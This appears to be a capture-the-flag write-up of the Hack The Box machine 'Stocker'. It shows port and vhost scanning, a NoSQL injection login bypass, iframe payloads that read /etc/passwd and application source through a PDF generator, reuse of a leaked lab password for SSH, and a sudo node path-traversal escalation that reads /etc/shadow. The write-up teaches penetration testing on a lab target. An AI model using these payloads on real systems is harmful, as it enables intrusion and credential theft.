root💀bl4ck4non-sec:~#

Hack. Eat. Sleep. Repeat!!!

View on GitHub

Box: Stocker

Level: Easy

OS: Linux

Lets get started

Recon

PortScanning

command:sudo nmap -A 10.129.228.197 -v -p- -T4

Nmap scan report for stocker.htb (10.129.228.197)
Host is up (0.19s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 3d:12:97:1d:86:bc:16:16:83:60:8f:4f:06:e6:d5:4e (RSA)
|   256 7c:4d:1a:78:68:ce:12:00:df:49:10:37:f9:ad:17:4f (ECDSA)
|_  256 dd:97:80:50:a5:ba:cd:7d:55:e8:27:ed:28:fd:aa:3b (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-favicon: Unknown favicon MD5: 4EB67963EC58BC699F15F80BBE1D91CC
|_http-title: Stock - Coming Soon!
| http-methods: 
|_  Supported Methods: GET HEAD
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-generator: Eleventy v2.0.0
Aggressive OS guesses: Linux 5.0 (97%), Linux 4.15 - 5.8 (96%), Linux 5.3 - 5.4 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.5 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 32.171 days (since Thu Sep 21 23:48:56 2023)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=264 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 256/tcp)
HOP RTT       ADDRESS
1   189.37 ms 10.10.14.1
2   189.55 ms stocker.htb (10.129.228.197)

Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Oct 24 03:55:08 2023 -- 1 IP address (1 host up) scanned in 706.90 seconds

From our scan we have 2 open ports, port 22 and port 80. Our enumeration today will be focused on port 80

Enumeration

Navigate to the webpage

image

Add the domain name stocker.htb to your /etc/hosts` file.

We should be able to view the webpage now

image

cool, we can now view the webpage

image

I fuzzed for directories but didn’t find anything useful.

Lets fuzz for subdomains using gobuster

command:gobuster vhost -u http://stocker.htb -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt --append-domain

┌──(bl4ck4non👽bl4ck4non-sec)-[~/Downloads/HTB/stocker]
└─$ gobuster vhost -u http://stocker.htb -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt --append-domain
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:             http://stocker.htb
[+] Method:          GET
[+] Threads:         10
[+] Wordlist:        /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt
[+] User Agent:      gobuster/3.6
[+] Timeout:         10s
[+] Append Domain:   true
===============================================================
Starting gobuster in VHOST enumeration mode
===============================================================
Found: dev.stocker.htb Status: 302 [Size: 28] [--> /login]
Progress: 19966 / 19967 (99.99%)
===============================================================
Finished
===============================================================

We can see the subdomain dev.stocker.htb, add this to your /etc/hosts file and navigate to the subdomain

image

We have a login page. Checking wappalyzer I saw that the javascript framework being used for that subdomain is express

The login form can be exploited to be bypassed using NoSQL and also by changing the “Content-Type” from application/x-www-form-urlencoded to application/json

Lets capture the login request using burpsuite then we send it over to burp repeater

image

We’ll be using the NoSQL payload

{"username": {"$gt":""}, "password": {"$gt":""}}

This will help bypass the login page, after modifying the request you should have something like this

image

Send the request, you should get a response like this

image

nice nice, now lets follow redirection

image image

Smooth we are logged in. Lets view this response in our browser

image

smooth😎.

Now, how does this application work

image image

Lets add the cup to our basket

You should see this when you try to “view cart”

image image

So, after submitting we get an “order id” and also the purchase order. Lets take a look at the purchase order

image

Take note of the url http://dev.stocker.htb/api/po/{orderid}. We can also see the name of the purchaser from the above screenshot, angoose is the purchaser’s name.

Lets repeat the ordering process again, but this time we’ll capture the request using burpsuite and send it over to burp repeater

image

Lets try to add a script that will read the /etc/passwd file,

<iframe src=/etc/passwd height=500 width=500></iframe>

image

We got the order id, lets view the purchase order here http://dev.stocker.htb/api/po/65373f42517120235afe321a

image

nice nice, we were able to read the /etc/passwd file. This is what we can iframe Injection

“Iframe injection” refers to a type of web security vulnerability or attack where an attacker inserts an <iframe> element into a web page to load and display content from an external source, often controlled by the attacker.

Earlier, when I was trying to bypass the login page, I caused a json error and it revealed the full path to the base folder where the Express application is on the file system

image

So the full path to the base folder is /var/www/dev

Lets try to read the server.js file

<iframe src=file:///var/www/dev/index.js height=1000px width=1000px></iframe>

image

Lets view the purchase order

image

We can see the password the web application uses to connect to the Mongo database. Since we have the username lets try to ssh into the server using the creds we found

username:angoose password:IHeardPassphrasesArePrettySecure

image

We got user shell. Lets escalate our privileges

Privilege Escalation

Running the command sudo -l

image

Node executable can be ran by user angoose to escalate privileges

Lets create a javascript script that can help us read root files

We can use this javascript script to read the /etc/shadow file

const fs = require('fs');

// Specify the file path
const filePath = '/etc/shadow';

// Read the file
fs.readFile(filePath, 'utf8', (err, data) => {
  if (err) {
    console.error('Error reading the file:', err);
  } else {
    console.log('File content:');
    console.log(data);
  }
});

save this in a file say “bankai.js”

command:sudo /usr/bin/node /usr/local/scripts/../../../home/angoose/bankai.js

image

The root hash is not crackable omor. I tried reading the private key /root/.ssh/id_rsa, but it wasn’t available on the server.

Lets just read the root flag, edit the bankai.js file, instead of /etc/shadow replace it with /root/root.txt

command:sudo /usr/bin/node /usr/local/scripts/../../../home/angoose/bankai.js

image

cool stuff, we were able to read the “root.txt” file

We have successfully pwned this box😎

That will be all for today

Back To Home